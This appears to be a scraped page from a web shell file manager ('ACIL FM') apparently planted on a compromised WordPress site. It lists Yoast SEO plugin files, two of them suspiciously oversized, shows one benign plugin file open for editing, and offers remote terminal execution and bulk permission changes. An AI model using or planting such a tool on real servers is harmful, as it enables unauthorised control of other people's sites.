ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/wordpress-seo/src/conditionals/admin
/
home
mhhtmff
www
site
wp-content
plugins
wordpress-seo
src
conditionals
admin
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
doing-post-quick-edit-save-conditional.php
1017 B
chmod
View
DL
Edit
Rename
Delete
estimated-reading-time-conditional.php
1.95 MB
chmod
View
DL
Edit
Rename
Delete
licenses-page-conditional.php
650 B
chmod
View
DL
Edit
Rename
Delete
non-network-admin-conditional.php
418 B
chmod
View
DL
Edit
Rename
Delete
post-conditional.php
736 B
chmod
View
DL
Edit
Rename
Delete
posts-overview-or-ajax-conditional.php
486 B
chmod
View
DL
Edit
Rename
Delete
yoast-admin-conditional.php
1.05 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/wordpress-seo/src/conditionals/admin/post-conditional.php
<?php namespace Yoast\WP\SEO\Conditionals\Admin; use Yoast\WP\SEO\Conditionals\Conditional; /** * Conditional that is only met when on a post edit or new post page. */ class Post_Conditional implements Conditional { /** * Returns whether or not this conditional is met. * * @return bool Whether or not the conditional is met. */ public function is_met() { global $pagenow; // Current page is the creation of a new post (type, i.e. post, page, custom post or attachment). if ( $pagenow === 'post-new.php' ) { return true; } // Current page is the edit page of an existing post (type, i.e. post, page, custom post or attachment). if ( $pagenow === 'post.php' ) { return true; } return false; } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply